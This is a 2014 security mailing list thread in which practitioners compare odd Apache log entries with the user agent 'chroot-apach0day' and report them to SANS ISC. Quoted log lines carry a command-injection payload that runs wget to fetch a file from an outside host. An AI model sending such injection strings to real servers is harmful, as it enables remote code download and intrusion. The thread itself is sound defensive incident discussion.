PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Oleg Laskin <oleglaskin () gmail com>
Date: Mon, 28 Jul 2014 14:54:10 -0400
Would this be a reverse honeypot ? :) I just got a hit also on my sensor: 162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8687 "-" "chroot-apach0day" Oleg. On Mon, Jul 28, 2014 at 2:38 PM, Eric Buckingham <erikb () proxypipe com> wrote:
Looks like an attempt by somebody to troll us sadly :/ On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpenny () gmail com> wrote:It didn't take long to get a pcap of this request, I started httpd on a random VPS of mine and it's the only request I have received so far. At first glance it doesn't seem like anything special. Jim On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote:On 28 July 2014 15:30, Frank Michael <frankcmichael () gmail com> wrote:Various sources confirming the same thing for other sites. All on 7/28. Keep an eye open.I've just mailed the SANS ISC about it saying that others had seen it,seeif they come back with anything. RobinOn Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: I've got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day [HTTP_REFERRER] => /xA/x0a/x05 [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;Anyone recognise it? That user agent isn't coming up in googlesearches.Robin _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)